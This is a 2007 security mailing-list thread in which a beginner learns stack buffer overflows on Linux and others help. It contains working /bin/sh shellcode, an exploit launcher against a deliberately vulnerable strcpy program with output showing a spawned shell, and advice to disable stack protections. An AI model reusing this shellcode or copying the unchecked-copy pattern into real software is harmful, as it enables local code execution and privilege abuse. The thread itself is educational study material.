understanding buffer overflows

hello, my name is michael, im from austria - so my english is very bad.

A few days ago i begin to experiment with bufferoverflows in linux.

i wrote a little c++ programm like this:

#include <string.h>

void main()
{
  char buffer[10];
  char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";
strcpy((char *)buffer,(char *)COPY);

}

k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten

so i put a few lines in the program to output addresses from functions and variables.

addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000)

i think this is maybe the problem - but why?

output from gdb:

 eax 0x0 0
ecx 0x41414141 1094795585
edx 0x1d7 471
ebx 0xb7e27ff4 -1209892876
esp 0x4141413d 0x4141413d
ebp 0x41414141 0x41414141
esi 0xb7f77ce0 -1208517408
edi 0x0 0
eip 0x80484ad 0x80484ad
eflags 0x210286 [ PF SF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51


hope anybody can help me understand/learn.

greets from austria, michael

Dear secacc7@...,

main()  function  may  actually  never  return,  depending on C compiler
implementation. Try it with different function.

--Wednesday, October 31, 2007, 5:36:22 PM, you wrote to vuln-dev@...:

shc> void main()
shc> {
shc>   char buffer[10];
shc>   char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";
shc> strcpy((char *)buffer,(char *)COPY);

shc> }

shc> k, this works very well, i got a core dump and have startet
shc> gdb. but in the output from "info all" was eip not overwritten


--
~/ZARAZA http://securityvulns.com/

Try this.. it is in C but you shouldn't have problems rewriting it..
In your example you are overrunning the buffer but you might not be overwriting the EIP .. try a bigger buffer

--
Best Regards,

Atanas


/*
 Overflow written for:

 x86 Pentium 4
 Linux version 2.6.5-7.104-default
 gcc version 3.3.3
 SuSE Linux
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>


#define MAX_BUF 530
#define RETADDR 0xbffff0c0

int main()
{
        int i;

        char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
       
        char buffer[MAX_BUF];
       
        // fill the buffer with the return address
        //the address to be overwritten is 524 bytes from the addr of buffer
        for (i=0; i<MAX_BUF; i+=4)

    *(long *)&buffer[i] = RETADDR;

        memcpy(buffer, shellcode, sizeof(shellcode));
        buffer[sizeof(shellcode)-1]='A'; //take care of an extra 0x00
       
        // I compiled the code provided as "vuln"

        execlp("./vuln", "vuln", buffer, NULL);
               
        exit(0);
}
       
/*

 OUTPUT:

***@localhost:~> ./test
sh-2.05b$ exit
exit
***@localhost:~>

*/

OVERFLOWN CODE:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int foo (char *input)
{
  char buffer [512];
 
  strcpy(buffer, input);
 
  return (0);
}

int main (int argc, char * argv[])

{
  if (argc > 1)
    foo(argv[1]);
  else
    printf("usage: %s string", argv[0]);
 
  exit (0);
}

- Show quoted text -


On 31 Oct 2007 14:36:22 -0000, secacc7@... <secacc7@...> wrote:

    hello, my name is michael, im from austria - so my english is very bad.


    A few days ago i begin to experiment with bufferoverflows in linux.


    i wrote a little c++ programm like this:


    #include < string.h>


    void main()

    {

      char buffer[10];

      char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";

    strcpy((char *)buffer,(char *)COPY);


    }


    k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten


    so i put a few lines in the program to output addresses from functions and variables.


    addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000)


    i think this is maybe the problem - but why?


    output from gdb:


    eax 0x0 0

    ecx 0x41414141 1094795585

    edx 0x1d7 471

    ebx 0xb7e27ff4 -1209892876

    esp 0x4141413d 0x4141413d

    ebp 0x41414141 0x41414141

    esi 0xb7f77ce0 -1208517408

    edi 0x0 0

    eip 0x80484ad 0x80484ad

    eflags 0x210286 [ PF SF IF RF ID ]

    cs 0x73 115

    ss 0x7b 123

    ds 0x7b 123

    es 0x7b 123

    fs 0x0 0

    gs 0x33 51



    hope anybody can help me understand/learn.


    greets from austria, michael

thank you!

this was a great example but it didnt work on my debian machine. - but it worked better than mine.

i have edited your example as folowed:

vuln.cpp:

#include <stdio.h>
#include <string.h>

int foo (char *input)
{
char buffer [10];
strcpy(buffer, input);
return (0);
}

int main (int argc, char * argv[])
{
if (argc > 1)
foo(argv[1]);
else
printf("usage: %s string", argv[0]);
return 1;
}


test.cpp:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
        char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        char buffer[20];
        long myaddr=(long)&shellcode;
        printf("Addr of Shellcode:%p\n",myaddr);
        long bufadr=(long)&buffer[14];
        *(long *)bufadr=myaddr;
        execlp("./vuln", "vuln", buffer, NULL);
        return 0;
}

and i think the output looks very ok - isnt it?

./test
Addr of Shellcode:0xbfef862a <<-
Speicherzugriffsfehler (core dumped)

and - i think the importent part - from gdb:

edi            0x0      0
eip            0xbfef862a       0xbfef862a <<-
eflags         0x210246 [ PF ZF IF RF ID ]

but no more shell session was loaded. :-(

thx.. this was a great example. yesterday i posted a replay with a different email address so i think, it was not acceptet.

i edited your exampleas followed(maybe it was a bit different, im now at work..)

vuln.cpp:

#include <stdio.h>
#include <string.h>


int foo(char *a)
{
char buffer[10];
strcpy((char *)buffer,a);
return 0;
}

int main(int argc, char * argv[])
{
foo(argv[1]);
return 0;
}

test.cpp:

#include <stdio.h>

int main()
{
char shellcode[]="Your provided shellcode";
printf("Address of Shellcode:%p\n",&shellcode);
char buffer[20];

//to put the address of shellcode at the correct position of buffer ( i ve stack randmoization on   i thik so its not static) - in my case i thing it was "14"
//dont no the currect conversation:
*(long *)&buffer[14]=(long *)&shellcode;

execlp("./vuln", "vuln", buffer, NULL);

}

ant this worked fine: after execute (./test) I get a result like this:

Address of shellcode: 0xbffff0c0

and gdb says too that eip points to 0xbffff0c0

i think this looks good - does it?

anyway, i didnt get a new instance of the shell.

if think maybe the shellcode havnt worked.

greets michael!

secacc7@... wrote: See above: you overwrote the saved EBP, ECX, and 3 bytes of ESP. If I
recall correctly, on stack-grows-down architectures (Intel et c. -
likely yours) the saved value of EBP occurs at a lower memory address
than the saved value of EIP (your target). The strcpy() call will copy
bytes to increasing memory addressed, so add bytes to the COPY array -
i.e. lengthen it.

Then, experiment with gdb until you've figure out what array length
overwrites the saved EIP value _exactly_. Make the last few bytes of
COPY 0x41, 0x42, 0x43, 0x44 so you can see what is landing where.

Once you can make the saved value of EIP be 0x44434241, you're ready to
roll.

Cheers
Ben

Resending because this did not seem to get trough the first time.

secacc7@... wrote:
> hope anybody can help me understand/learn.
>


You are probably using a newer version of gcc which is generating a
slightly different prologue/epilogue for main than you may be expecting.
 You should disassemble your program to try to understand it, you will
probably see something like this:

prologue:
 8048354:       8d 4c 24 04             lea    ecx,[esp+4]
 8048358:       83 e4 f0                and    esp,0xfffffff0
 804835b:       ff 71 fc                push   DWORD PTR [ecx-4]
 804835e:       55                      push   ebp
 804835f:       89 e5                   mov    ebp,esp
 8048361:       51                      push   ecx

<other stuff>

epilogue:
 80483d2:       83 c4 54                add    esp,0x54
 80483d5:       59                      pop    ecx
 80483d6:       5d                      pop    ebp
 80483d7:       8d 61 fc                lea    esp,[ecx-4]
 80483da:       c3                      ret

In all likelihood you did overwrite eip, but you are crashing at the ret
because you have clobbered esp (at 80483d7 in this case).  Note that you
did control ecx and ebp, thus you controlled esp as well.  With a
properly structured buffer, this is still exploitable.  Try using the
following program instead to make things a little easier:

#include <string.h>

void vuln() {
  char buffer[10];
  char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";
  strcpy((char *)buffer,(char *)COPY);
}

void main() {
   vuln();
}

FYI, it also looks like you may have stack randomization turned on.  You
 will probably want to disable any stack protections you are using if
you want to play around with stack overflows.

Chris